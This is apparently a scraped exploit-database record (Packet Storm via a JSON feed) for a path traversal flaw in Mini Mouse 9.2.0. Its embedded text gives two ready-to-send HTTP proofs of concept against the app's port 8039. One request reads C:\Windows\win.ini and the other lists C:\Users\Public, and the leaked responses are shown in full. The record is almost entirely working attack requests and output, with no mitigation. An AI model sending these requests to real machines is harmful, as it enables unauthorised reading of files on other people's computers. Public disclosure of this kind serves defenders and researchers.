{"id": "PACKETSTORM:162079", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mini Mouse 9.2.0 Path Traversal", "description": "", "published": "2021-04-05T00:00:00", "modified": "2021-04-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162079/Mini-Mouse-9.2.0-Path-Traversal.html", "reporter": "gosh", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-04-05T15:34:07", "viewCount": 273, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1678917189, "epss": 1679070268}, "_internal": {"score_hash": "03bbca061edb3c67b8f529727ad1a853"}, "sourceHref": "https://packetstormsecurity.com/files/download/162079/minimouse920-traversal.txt", "sourceData": "`# Exploit Title: Mini Mouse 9.2.0 - Path Traversal \n# Author: gosh \n# Date: 02-04-2021 \n# Vendor Homepage: http://yodinfo.com \n# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi \n# Version: 9.2.0 \n# Tested on: Windows 10 Pro build 19042.662 \n \nPOC \n \nGET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 \nHost: 192.168.1.111:8039 \nContent-Type: application/json \nConnection: keep-alive \nAccept: */* \nUser-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) \nAccept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 \nContent-Length: 0 \nAccept-Encoding: gzip, deflate \n \n{} \n \n \n \n \n....................................................... \n \nHTTP/1.1 200 OK \nServer: bruce_wy/1.0.0 \nAccess-Control-Allow-Methods: POST,GET,TRACE,OPTIONS \nAccess-Control-Allow-Headers: Content-Type,Origin,Accept \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Credentials: true \nP3P: CP=CAO PSA OUR \nContent-Type: application/octet-stream \nContent-Range: bytes 0-0/92 \nContent-Length : 92 \n \n; for 16-bit app support \n[fonts] \n[extensions] \n[mci extensions] \n[files] \n[Mail] \nMAPI=1 \n \n \nsecond POC: \n \nPOST /op=get_file_list HTTP/1.1 \nHost: 192.168.1.111:8039 \nContent-Type: application/json \nConnection: keep-alive \nAccept: */* \nUser-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) \nAccept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 \nContent-Length: 28 \nAccept-Encoding: gzip, deflate \n \n{\"path\":\"C:\\\\Users\\\\Public\"} \n \n \n \n............................................................. \n \nHTTP/1.1 200 OK \nServer: bruce_wy/1.0.0 \nAccess-Control-Allow-Methods: POST,GET,TRACE,OPTIONS \nAccess-Control-Allow-Headers: Content-Type,Origin,Accept \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Credentials: true \nP3P: CP=CAO PSA OUR \nContent-Type: application/json \nContent-Range: bytes 0-0/-1 \n \n{ \n\"ret_code\": 1, \n\"ret_msg\": \"success\", \n\"data\": { \n\"list\": [{ \n\"path\": \"C:\\\\Users\\\\Public\\\\AccountPictures\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"AccountPictures\", \n\"name_display\": \"AccountPictures\", \n\"file_size\": 0, \n\"create_time\": 1615677, \n\"update_time\": 1615737, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Desktop\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"Desktop\", \n\"name_display\": \"Desktop\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1617276, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\desktop.ini\", \n\"is_hide\": true, \n\"is_floder\": false, \n\"name\": \"desktop.ini\", \n\"name_display\": \"desktop\", \n\"file_size\": 174, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Documents\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Documents\", \n\"name_display\": \"Documents\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Downloads\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Downloads\", \n\"name_display\": \"Downloads\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Libraries\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"Libraries\", \n\"name_display\": \"Libraries\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575714, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Music\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Music\", \n\"name_display\": \"Music\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Pictures\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Pictures\", \n\"name_display\": \"Pictures\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Videos\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Videos\", \n\"name_display\": \"Videos\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}] \n} \n} \n`\n"}
{}
Mini Mouse 9.2.0 Path Traversal